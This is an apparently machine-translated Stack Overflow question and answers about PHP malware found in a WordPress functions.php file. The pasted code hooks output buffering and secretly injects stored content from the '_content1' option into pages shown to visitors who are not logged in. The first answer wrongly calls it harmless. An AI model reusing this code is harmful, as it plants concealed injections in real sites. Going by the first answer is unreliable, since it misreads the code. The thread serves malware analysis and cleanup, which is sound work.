这个恶意代码注入到functions.php文件中的作用是什么?

时间:2013-08-14 03:09:55

标签: php inject virus

我在客户端functions.php文件中发现了一些恶意代码。这是做什么的,我不知道。我对PHP很好,但没有专家肯定。有什么想法吗?

if (!function_exists("b_call")) {
    function b_call() {
        if (!ob_get_level()) ob_start("b_goes");
    }
    function b_goes($p) {
        if (!defined('wp_m1')) {
            if (isset($_COOKIE['wordpress_test_cookie'])
                || isset($_COOKIE['wp-settings-1'])
                || isset($_COOKIE['wp-settings-time-1'])
                || (function_exists('is_user_logged_in') && is_user_logged_in())
                || (!$m = get_option('_content1'))
            ) {
                return $p;
            }
            list($m, $n) = @unserialize(trim(strrev($m)));
            define('wp_m1', $m);
            define('wp_n1', $n);
        }
        if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
        if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
        return $p;
    }
    function b_end() {
        @ob_end_flush();
    }
    if (ob_get_level()) ob_end_clean();
    add_action("init", "b_call");
    add_action("wp_head", "b_call");
    add_action("get_sidebar", "b_call");
    add_action("wp_footer", "b_call");
    add_action("shutdown", "b_end");
}

2 个答案:

答案 0 :(得分:1)

如果用户已登录,它将从Wordpress选项字段_content1中提取内容。它还在body,head和div标记之后添加新的行字符。据我所知,没有恶意代码。该块中最奇怪的代码是OB代码,它只是PHP输出缓冲区的函数 - 也不是恶意代码。

答案 1 :(得分:1)

它允许将_content1列中的选项表中保存的内容拉出,作为内容添加到WordPress主题的页眉,页脚等中。

注入代码的人最有可能将一些html设置为_content1选项,如viagra add,或者他们在服务器上有另一个脚本等待更新选项。您可能希望在站点的根目录中查找奇怪的.php文件。可能有一个简单的eval($ _ REQEST)等着你。

相关问题
最新问题